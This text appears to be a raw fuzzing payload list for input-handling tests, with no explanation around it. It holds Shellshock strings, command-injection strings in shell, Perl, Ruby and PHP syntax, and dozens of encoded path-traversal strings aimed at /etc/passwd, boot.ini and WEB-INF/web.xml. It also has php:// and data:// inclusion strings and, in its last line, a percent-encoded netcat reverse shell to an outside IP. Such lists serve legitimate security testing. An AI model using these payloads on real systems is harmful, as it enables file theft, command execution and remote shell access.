() { 0; }; touch /tmp/blns.shellshock1.fail;
() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
<<< %s(un='%s') = %u
'+++ATH0
/dev/null; touch /tmp/blns.fail ; echo
`touch /tmp/blns.fail`
$(touch /tmp/blns.fail)
@{[system "touch /tmp/blns.fail"]}
eval("puts 'hello world'")
System("ls -al /")
`ls -al /`
Kernel.exec("ls -al /")
Kernel.exit(1)
%x('ls -al /')
$HOME
$ENV{'HOME'}
File:///b'/../../../../file'
b'\\..\\..\\..\\..\\file'
b'\\../\\../\\../file'
b'/..\\/..\\file.txt'
b'/%c0%ae/WEB-INF/web.xml'
b'/webapp/WEB-INF./web.xml'
b'/.........................../../../../file'
b'/...........................\\..\\..\\..\\file'
b'/..//..//..//..//file'
b'/..///..///..///..///file'
b'/..\\\\..\\\\..\\\\..\\\\file'
b'/..\\\\\\..\\\\\\..\\\\\\file'
b'/./\\/././\\/./file'
b'/.\\/\\.\\.\\/\\.\\file'
b'/././././././././././././file'
b'/.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\file'
b'/./.././.././../file'
b'/.\\..\\.\\..\\.\\..\\file'
b'/.//..//.//..//.//..//file'
b'/.\\\\..\\\\.\\\\..\\\\.\\..\\\\file'
b'/.//././/././/./boot.ini'
b'/../..//../..//file'
b'/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/dir%5C/file'
b'/..\\/..\\/..\\/..\\/..\\/..\\/..\\/file'
b'/.../.../.../.../.../file'
b'/..%2E/..%2E/..%2E/..%2E/..%2E/file'
b'/..%2F..%2F..%2F..%2Fetc/mtc'
b'/..%5c..%5C..%5Cfile'
b'/%2E%2E/%2E%2E/%2E%2E/etc/mtc'
b'/%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fmtc'
b'/..%252f..%252F..%252fetc/mtc'
b'/%252E%252E/%252E%252E/%252E%252E/etc/mtc'
b'/%252E%252E%252f%252E%252E%252f%252E%252E%252ffile'
b'/..%255c..%255c..%255cboot.ini'
b'/%252E%252E\\%252E%252E\\%252E%252E\\file'
b'/%2e%2e%5c%2e%2e%5c%2e%2e%5cfile'
b'/%252E%252E%255c%252E%252E%255c%252E%252E%255cfile.ini'
b'/..%c0%af..%c0%af..%c0%affile'
b'/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/file'
b'/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%affile'
b'/..%25c0%25af..%25c0%25affile'
b'/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/file'
b'/%25c0%25ae%25c0%25ae%25c0%25affile'
b'/..%c1%9c..%c1%9c\\file'
b'/%c0%ae%c0%ae\\%c0%ae%c0%ae\\file'
b'/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cfile'
b'/..%25c1%259c..%25c1%259cfile'
b'/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\file'
b'/%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cfile'
b'/..%%32%66..%%32%66..%%32%66file.ini'
b'%%32%65%%32%65/%%32%65%%32%65/file.ini'
b'/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66file.ini'
b'/..%%35%63..%%35%63file'
b'/%%32%65%%32%65\\%%32%65%%32%65\\file'
b'/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63file'
b'/%%32e%%32e%%32f%%32e%%32e%%32f%%32e%%32e%%32ffile'
b'/%2%65%2%65%2%66%2%65%2%65%2%66%2%65%2%65%2%66file'
b'/%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002ffile'
b'../../../file'
b'..%2f..%2f..%2ffile'
b'%2e%2e/%2e%2e/file'
b'%2e%2e%2f%2e%2e%2ffile'
b'../../../file%00'
b'.........................../../../../file'
b'...........................\\..\\..\\..\\file'
b'../../../../../filename/////[...]/////'
b'../../../../../file//////////////'
b'/../etc/./passwd%00'
b'/../etc/./passwd'
b'/showcode.php/C:Windows/aaa.txt'
b'file:///etc/hosts'
b'data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4='
b'../etc/./hosts'
b'../../etc/././././hosts'
b'php://filter/read=convert.base64-encode/resource=index.php'
b'../../../../etc/aaa/../hosts'
b'../../../../etc/aaa/../aaa/bbb/../../hosts'
b'..////////////..////////////////..///////////////../etc//////////hosts'
b'../../../../etc/hosts/.'
b'/etc/passwd/./././././.'
b'/etc/hosts///////////'
b'http://localhost/aa.txt'
b'www.site.com/aa.txt'
b';ls+-al;'
b'|+ping+|'
b'&&+ping'
b'%0a+ping+localhost+-i+3'
b'..%2F..%2F..%2Fbin/ls%20-al|'
b'..%c0%af..%c0%af../bin/ls%20-al|'
b'%31%3b%6c%73%20%2d%61%6c%3b'
b'%31%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%73%68%20%31%2e%31%2e%31%2e%31%20%33%33'
